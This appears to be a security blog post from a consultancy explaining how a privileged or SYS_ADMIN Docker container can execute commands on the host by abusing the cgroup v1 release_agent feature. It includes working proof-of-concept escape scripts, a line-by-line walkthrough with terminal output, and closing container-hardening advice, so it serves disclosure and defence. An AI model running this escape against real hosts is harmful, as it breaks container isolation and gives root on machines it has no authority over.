Understanding Docker container escapes
Trail of Bits recently completed a security assessment of Kubernetes, including its interaction with Docker. Felix Wilhelm’s recent tweet of a Proof of Concept (PoC) “container escape” sparked our interest, since we performed similar research and were curious how this PoC could impact Kubernetes.
Felix’s tweet shows an exploit that launches a process on the host from within a Docker container run with the --privileged
flag. The PoC achieves this by abusing the Linux cgroup v1 “notification on release” feature.
Here’s a version of the PoC that launches ps on the host:
# spawn a new container to exploit via: # docker run --rm -it --privileged ubuntu bash d=`dirname $(ls -x /s*/fs/c*/*/r* |head -n1)` mkdir -p $d/w;echo 1 >$d/w/notify_on_release t=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab` touch /o; echo $t/c >$d/release_agent;printf '#!/bin/sh\nps >'"$t/o" >/c; chmod +x /c;sh -c "echo 0 >$d/w/cgroup.procs";sleep 1;cat /o
The --privileged
flag introduces significant security concerns, and the exploit relies on launching a docker container with it enabled. When using this flag, containers have full access to all devices and lack restrictions from seccomp, AppArmor, and Linux capabilities.
Don’t run containers with --privileged
. Docker includes granular settings that independently control the privileges of containers. In our experience, these critical security settings are often forgotten. It is necessary to understand how these options work to secure your containers.
In the sections that follow, we’ll walk through exactly how this “container escape” works, the insecure settings that it relies upon, and what developers should do instead.
Requirements to use this technique
In fact, --privileged
provides far more permissions than needed to escape a docker container via this method. In reality, the “only” requirements are:
- We must be running as root inside the container
- The container must be run with the
SYS_ADMIN
Linux capability - The container must lack an AppArmor profile, or otherwise allow the
mount
syscall - The cgroup v1 virtual filesystem must be mounted read-write inside the container
The SYS_ADMIN
capability allows a container to perform the mount syscall (see man 7 capabilities). Docker starts containers with a restricted set of capabilities by default and does not enable the SYS_ADMIN
capability due to the security risks of doing so.
Further, Docker starts containers with the docker-default
AppArmor policy by default, which prevents the use of the mount syscall even when the container is run with SYS_ADMIN
.
A container would be vulnerable to this technique if run with the flags: --security-opt apparmor=unconfined --cap-add=SYS_ADMIN
Using cgroups to deliver the exploit
Linux cgroups are one of the mechanisms by which Docker isolates containers. The PoC abuses the functionality of the notify_on_release
feature in cgroups v1 to run the exploit as a fully privileged root user.
When the last task in a cgroup leaves (by exiting or attaching to another cgroup), a command supplied in the release_agent
file is executed. The intended use for this is to help prune abandoned cgroups. This command, when invoked, is run as a fully privileged root on the host.
1.4 What does notify_on_release do ?
————————————
If the notify_on_release flag is enabled (1) in a cgroup, then whenever the last task in the cgroup leaves (exits or attaches to some other cgroup) and the last child cgroup of that cgroup is removed, then the kernel runs the command specified by the contents of the “release_agent” file in that hierarchy’s root directory, supplying the pathname (relative to the mount point of the cgroup file system) of the abandoned cgroup. This enables automatic removal of abandoned cgroups. The default value of notify_on_release in the root cgroup at system boot is disabled (0). The default value of other cgroups at creation is the current value of their parents’ notify_on_release settings. The default value of a cgroup hierarchy’s release_agent path is empty.
Refining the proof of concept
There is a simpler way to write this exploit so it works without the --privileged
flag. In this scenario, we won’t have access to a read-write cgroup mount provided by --privileged
. Adapting to this scenario is easy: we’ll just mount the cgroup as read-write ourselves. This adds one extra line to the exploit but requires fewer privileges.
The exploit below will execute a ps aux command on the host and save its output to the /output
file in the container. It uses the same release_agent
feature as the original PoC to execute on the host.
# On the host docker run --rm -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined ubuntu bash # In the container mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x echo 1 > /tmp/cgrp/x/notify_on_release host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab` echo "$host_path/cmd" > /tmp/cgrp/release_agent echo '#!/bin/sh' > /cmd echo "ps aux > $host_path/output" >> /cmd chmod a+x /cmd sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
Breaking down the proof of concept
Now that we understand the requirements to use this technique and have refined the proof of concept exploit, let’s walk through it line-by-line to demonstrate how it works.
To trigger this exploit we need a cgroup where we can create a release_agent
file and trigger release_agent
invocation by killing all processes in the cgroup. The easiest way to accomplish that is to mount a cgroup controller and create a child cgroup.
To do that, we create a /tmp/cgrp
directory, mount the RDMA cgroup controller and create a child cgroup (named “x” for the purposes of this example). While every cgroup controller has not been tested, this technique should work with the majority of cgroup controllers.
If you’re following along and get “mount: /tmp/cgrp: special device cgroup does not exist”, it’s because your setup doesn’t have the RDMA cgroup controller. Change rdma
to memory
to fix it. We’re using RDMA because the original PoC was only designed to work with it.
Note that cgroup controllers are global resources that can be mounted multiple times with different permissions and the changes rendered in one mount will apply to another.
We can see the “x” child cgroup creation and its directory listing below.
root@b11cf9eab4fd:/# mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x root@b11cf9eab4fd:/# ls /tmp/cgrp/ cgroup.clone_children cgroup.procs cgroup.sane_behavior notify_on_release release_agent tasks x root@b11cf9eab4fd:/# ls /tmp/cgrp/x cgroup.clone_children cgroup.procs notify_on_release rdma.current rdma.max tasks
Next, we enable cgroup notifications on release of the “x” cgroup by writing a 1 to its notify_on_release
file. We also set the RDMA cgroup release agent to execute a /cmd
script — which we will later create in the container — by writing the /cmd
script path on the host to the release_agent
file. To do it, we’ll grab the container’s path on the host from the /etc/mtab
file.
The files we add or modify in the container are present on the host, and it is possible to modify them from both worlds: the path in the container and their path on the host.
Those operations can be seen below:
root@b11cf9eab4fd:/# echo 1 > /tmp/cgrp/x/notify_on_release root@b11cf9eab4fd:/# host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab` root@b11cf9eab4fd:/# echo "$host_path/cmd" > /tmp/cgrp/release_agent
Note the path to the /cmd
script, which we are going to create on the host:
root@b11cf9eab4fd:/# cat /tmp/cgrp/release_agent /var/lib/docker/overlay2/7f4175c90af7c54c878ffc6726dcb125c416198a2955c70e186bf6a127c5622f/diff/cmd
Now, we create the /cmd
script such that it will execute the ps aux
command and save its output into /output
on the container by specifying the full path of the output file on the host. At the end, we also print the /cmd
script to see its contents:
root@b11cf9eab4fd:/# echo '#!/bin/sh' > /cmd root@b11cf9eab4fd:/# echo "ps aux > $host_path/output" >> /cmd root@b11cf9eab4fd:/# chmod a+x /cmd root@b11cf9eab4fd:/# cat /cmd #!/bin/sh ps aux > /var/lib/docker/overlay2/7f4175c90af7c54c878ffc6726dcb125c416198a2955c70e186bf6a127c5622f/diff/output
Finally, we can execute the attack by spawning a process that immediately ends inside the “x” child cgroup. By creating a /bin/sh
process and writing its PID to the cgroup.procs
file in “x” child cgroup directory, the script on the host will execute after /bin/sh
exits. The output of ps aux
performed on the host is then saved to the /output
file inside the container:
root@b11cf9eab4fd:/# sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs" root@b11cf9eab4fd:/# head /output USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND root 1 0.1 1.0 17564 10288 ? Ss 13:57 0:01 /sbin/init root 2 0.0 0.0 0 0 ? S 13:57 0:00 [kthreadd] root 3 0.0 0.0 0 0 ? I< 13:57 0:00 [rcu_gp] root 4 0.0 0.0 0 0 ? I< 13:57 0:00 [rcu_par_gp] root 6 0.0 0.0 0 0 ? I< 13:57 0:00 [kworker/0:0H-kblockd] root 8 0.0 0.0 0 0 ? I< 13:57 0:00 [mm_percpu_wq] root 9 0.0 0.0 0 0 ? S 13:57 0:00 [ksoftirqd/0] root 10 0.0 0.0 0 0 ? I 13:57 0:00 [rcu_sched] root 11 0.0 0.0 0 0 ? S 13:57 0:00 [migration/0]
Use containers securely
Docker restricts and limits containers by default. Loosening these restrictions may create security issues, even without the full power of the --privileged
flag. It is important to acknowledge the impact of each additional permission, and limit permissions overall to the minimum necessary.
To help keep containers secure:
- Do not use the
--privileged
flag or mount a Docker socket inside the container. The docker socket allows for spawning containers, so it is an easy way to take full control of the host, for example, by running another container with the--privileged
flag. - Do not run as root inside the container. Use a different user or user namespaces. The root in the container is the same as on host unless remapped with user namespaces. It is only lightly restricted by, primarily, Linux namespaces, capabilities, and cgroups.
- Drop all capabilities (
--cap-drop=all
) and enable only those that are required (--cap-add=...
). Many of workloads don’t need any capabilities and adding them increases the scope of a potential attack. - Use the “no-new-privileges” security option to prevent processes from gaining more privileges, for example through suid binaries.
- Limit resources available to the container. Resource limits can protect the machine from denial of service attacks.
- Adjust seccomp, AppArmor (or SELinux) profiles to restrict the actions and syscalls available for the container to the minimum required.
- Use official docker images or build your own based on them. Don’t inherit or use backdoored images.
- Regularly rebuild your images to apply security patches. This goes without saying.
If you would like a second look at your organization’s critical infrastructure, Trail of Bits would love to help. Reach out and say hello!